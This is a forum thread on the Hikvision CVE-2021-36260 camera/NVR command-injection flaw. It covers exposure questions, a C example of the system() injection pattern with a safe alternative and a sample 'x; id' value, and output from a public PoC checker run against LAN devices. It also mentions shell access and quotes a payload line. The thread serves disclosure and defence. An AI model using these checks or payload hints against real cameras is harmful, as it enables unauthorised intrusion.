Unauthenticated Remote Code Execution (RCE) vulnerability in Hikvision IP camera/NVR firmware (CVE-2021-36260)

Adding my thanks to the great work on finding this vulnerability. One thing that has always bugged me is that I can never figure out which firmware updates to apply (USA equipment) from 2016.

My NVR is DS-716NI-SP (16 port). The affected lists here do not have a '-SP'. My cameras are 2cd2142fwd-i. Because of the confusion (and fear of bricking) I have not updated in some time, and my intermittent searches have not indicated that updates exist for this older hardware.
My NVR is at V3.4.5 build 170518, and cameras are at V5.5.82 build 190220

Can anyone give me an idea if I need to update and specifically which file?
 
Failed to mention in my prior post that my NVR is not connected to the internet except for NTP. The cameras also do not see the internet.
 
Thanks for the updated link. My hardware is not on that list :), it seems to apply to newer hardware than I have.
I earlier posted a typo for my NVR. It's a DS-7716NI-SP (16 port), circa 2015, not a 716NI

The posted link also points to a FAQ which offered me useful info, including the fact that since it's not port forwarded and inside a LAN protected with a firewall appliance my risks are very low.
 
That's true.

And for anyone still unclear - to quote from the FAQ:

To exploit this vulnerability, an attacker must be on the same network as the vulnerable device. In other words, if the attacker is able to view the log in screen of a vulnerable device, they could attack it.

If they cannot get to the login screen of a vulnerable device, they are not able to exploit the vulnerability
 
I didn't try it on my camera, but this code ... are you sure this is an unintentional bug?

but wow
Well, you cannot be sure about anything really, but my gut feeling is that this is not intentional - however, maybe this is how it is supposed to be, who really knows?
Anyhow, I've checked a "fixed" version, and there is filtering now, but the URI and "language" tags are still there, for what purpose - I really don't know.

Still, a very interesting vulnerability, and an extremely convenient one for performing additional research.
 
Read the explanations linked to in post #1 that covers this.

I read everything.

This kind of bug is something that a beginner / co-op student would make, and the fact that (if there is any team) QA and the code reviewer didn't catch it is weird.

All the stars were aligned.
 
I have seen this kind of bug a lot, more times than I can remember...

All falls down on one stupid 'system()' call.

'system()' should never have any kind of user provided input, (filtered or not) period.
 
Anyhow, thanks to @watchful_ip's report, it was quite obvious that 'system()' was involved, with limited command injection (as per his/her PoC of /etc/passwd). It was pretty easy to find the 'system()' call with user-provided input (actually only one candidate that I saw), a little searching for which URI, and then some additional searching for the right XML tag (thanks Hik, for your debug note), then test it with 'reboot()' to confirm.
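The point made above about 'system()' and user-provided input is worth seeing side by side with the alternative. The following is an added illustration, not code from this thread or from any Hikvision firmware; the handler, directory and file-name rules are hypothetical. It shows what a shell receives when a request value is concatenated into a command line, an allowlist check that rejects such values before any process starts, and the exec-without-a-shell pattern in which the validated value can only ever be a single argument.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (built for display only, never passed to system() here):
 * the request value is pasted into a shell command line, so any shell
 * metacharacter in it (';', '|', '`', '$(' ...) becomes part of the command.
 * Hypothetical handler: list a file under /var/www. */
int build_shell_command(char *out, size_t outlen, const char *user_value)
{
    int n = snprintf(out, outlen, "ls -l /var/www/%s", user_value);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Allowlist check (assumed policy for this handler): non-empty, at most 64
 * bytes, only letters, digits, '.', '_' and '-', and no ".." so the value
 * cannot climb out of the intended directory. Anything else is rejected
 * before a process is started; there is no attempt to "filter" bad characters. */
int is_safe_filename(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 64)
        return 0;
    if (strstr(s, "..") != NULL)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened pattern: no shell at all. The program path and argument vector are
 * fixed in code; the validated value travels as ONE argv element, so even a
 * loosened allowlist could not turn it into a second command.
 * Returns the child's exit status, or -1 if the value is rejected or the
 * process cannot be started. */
int list_file_without_shell(const char *filename)
{
    char path[128];

    if (!is_safe_filename(filename))
        return -1;
    snprintf(path, sizeof path, "/var/www/%s", filename);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ls", "-l", path, NULL };
        execv("/bin/ls", argv);
        _exit(127); /* only reached if execv itself fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[256];
    const char *hostile = "x; id";   /* constructed sample request value */

    build_shell_command(cmd, sizeof cmd, hostile);
    printf("what system() would receive: %s\n", cmd); /* two commands */
    printf("allowlist verdict on \"%s\": %d\n", hostile, is_safe_filename(hostile));
    printf("allowlist verdict on \"index.html\": %d\n", is_safe_filename("index.html"));
    printf("exec without shell on hostile value: %d\n", list_file_without_shell(hostile));
    return 0;
}
```

The allowlist is the first line of defence, but the exec-without-shell part is what makes the 'system()' class of bug impossible rather than merely unlikely: with execv() there is no shell parsing the string, so a stray ';' in the argument is just a character in a file name that ls will fail to find.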
 
You can verify your cams now, PoC here
This didn't work using an iMac. Later I'll fire up my linux machine and try again. Admittedly I'm not proficient in this sort of stuff and additionally may have incorrectly installed Python3 on my Mac.
I named the file hikvision.py rather than the name presented at GitHub.
Code:
Python3 hikvision.py --rhost 192.168.x.x --rport8080 --check

Traceback (most recent call last):
File "hikvision.py", line 66, in <module>
import requests
ModuleNotFoundError: No module named 'requests'
 

Open a terminal window, then run "pip install requests".

This should solve it on your Mac.
 
Thanks. Result is "cannot establish connection". :)

As expected, all is good.
I suspect that you have a network connectivity issue with the target.

Below is a worked example of the PoC tool operating.

In the first attempt at the 192.168.1.64 target, the camera is powered off, so there is the error 'Cannot establish connection ...'
In the remaining 3 tests, the targets are live.
Code:
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.64  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.64:80"
[-] Cannot establish connection to "192.168.1.64:80"
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.112  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.112:80"
[i] ETag: "e69-258-601f845c"
[!] Remote is verified exploitable
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.111  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.111:80"
[i] ETag: "468-258-5e6f4e77"
[-] Could not verify if vulnerable (Code: 500)
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.64  --check
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.64:80"
[i] ETag: "306-258-5e17dd7b"
[-] Could not verify if vulnerable (Code: 500)
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $
 
The Python script does not let me log on to a shell after the first attempt. I had to alter the script to get it to let me log in to a shell repeatedly.

It would be interesting to know why, but I guess you commented out "remote.send(query_args='cat N>webLib/N')"?
(I put the whole 'already pwn' check there to avoid having multiple identical entries in (my) /etc/passwd.)
 